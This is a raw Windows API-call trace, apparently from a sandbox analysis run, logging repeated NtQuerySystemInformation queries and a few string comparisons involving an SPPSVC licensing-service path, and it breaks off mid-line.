[0210.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe190, Length=0x20, ResultLength=0x0) [0210.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe450, Length=0x38, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe450, Length=0x38, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe2d0, Length=0x20, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe260, Length=0x20, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe260, Length=0x20, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x28, ResultLength=0x0) [0210.351] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x28, ResultLength=0x0) [0210.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x28, ResultLength=0x0) [0210.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x28, ResultLength=0x0) [0210.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x28, ResultLength=0x0) [0210.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x20, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x20, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x20, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x20, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x20, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe690, Length=0x20, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe690, Length=0x20, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x28, ResultLength=0x0) [0210.360] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x28, ResultLength=0x0) [0210.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x28, ResultLength=0x0) [0210.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x28, ResultLength=0x0) [0210.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x28, ResultLength=0x0) [0210.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x20, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x20, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x20, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x20, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x20, ResultLength=0x0) [0210.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe690, Length=0x20, ResultLength=0x0) [0210.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe690, Length=0x20, ResultLength=0x0) [0210.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x28, ResultLength=0x0) [0210.370] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x28, ResultLength=0x0) [0210.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x28, ResultLength=0x0) [0210.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x28, ResultLength=0x0) [0210.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x28, ResultLength=0x0) [0210.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x20, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x20, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x20, ResultLength=0x0) [0210.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe680, Length=0x20, ResultLength=0x0) [0210.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe700, Length=0x20, ResultLength=0x0) [0210.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe690, Length=0x20, ResultLength=0x0) [0210.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe690, Length=0x20, ResultLength=0x0) [0210.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe8d0, Length=0x28, ResultLength=0x0) [0210.380] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe950, Length=0x50, ResultLength=0x0) [0210.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x28, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x28, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6b0, Length=0x28, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x28, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x38, ResultLength=0x0) [0210.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x28, ResultLength=0x0) [0210.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 